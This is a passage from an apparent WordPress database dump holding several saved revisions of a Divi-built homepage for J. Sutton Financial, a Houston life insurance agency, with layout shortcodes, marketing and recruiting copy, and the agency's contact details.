button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"80%\" custom_margin=\"|37px||||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#f9f7f4\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" global_colors_info=\"{}\" custom_padding=\"66px||77px|||\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_padding=\"|||0px||\" animation_style=\"fade\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"11px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin=\"-11px|||||\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||183px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" sticky_enabled=\"0\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" height=\"148px\" sticky_enabled=\"0\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"j sutton logo white no background\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"|188px||188px||true\" width=\"46.1%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on|||#f9f9f9|dotted\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" text_text_color=\"#FFFFFF\" background_layout=\"dark\" sticky_enabled=\"0\" link_text_color=\"#f9f9f9\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_padding=\"||110px|||\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 17:41:18','2023-04-02 17:41:18','',138,'http://cmdev-site1.com/?p=570',0,'revision','',0),(574,1,'2023-04-02 17:45:52','2023-04-02 17:45:52','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjEzOCJ9fQ==@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||59px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_padding=\"|||0px||\" animation_style=\"fade\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin=\"|||0px||\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 17:45:52','2023-04-02 17:45:52','',138,'http://cmdev-site1.com/?p=574',0,'revision','',0),(573,1,'2023-04-02 17:44:55','2023-04-02 17:44:55','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" dropdown_menu_line_color=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" dropdown_menu_active_link_color=\"#003372\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" header_text_align=\"center\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" hover_enabled=\"0\" global_colors_info=\"{}\" text_orientation=\"center\" sticky_enabled=\"0\" custom_padding=\"||0px|||\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjEzOCJ9fQ==@\" _dynamic_attributes=\"button_one_url\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"80%\" custom_margin=\"|37px||||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" global_colors_info=\"{}\" custom_padding=\"66px||66px|||\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_padding=\"|||0px||\" animation_style=\"fade\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"11px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin=\"-11px|||||\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" sticky_enabled=\"0\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" height=\"148px\" sticky_enabled=\"0\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" 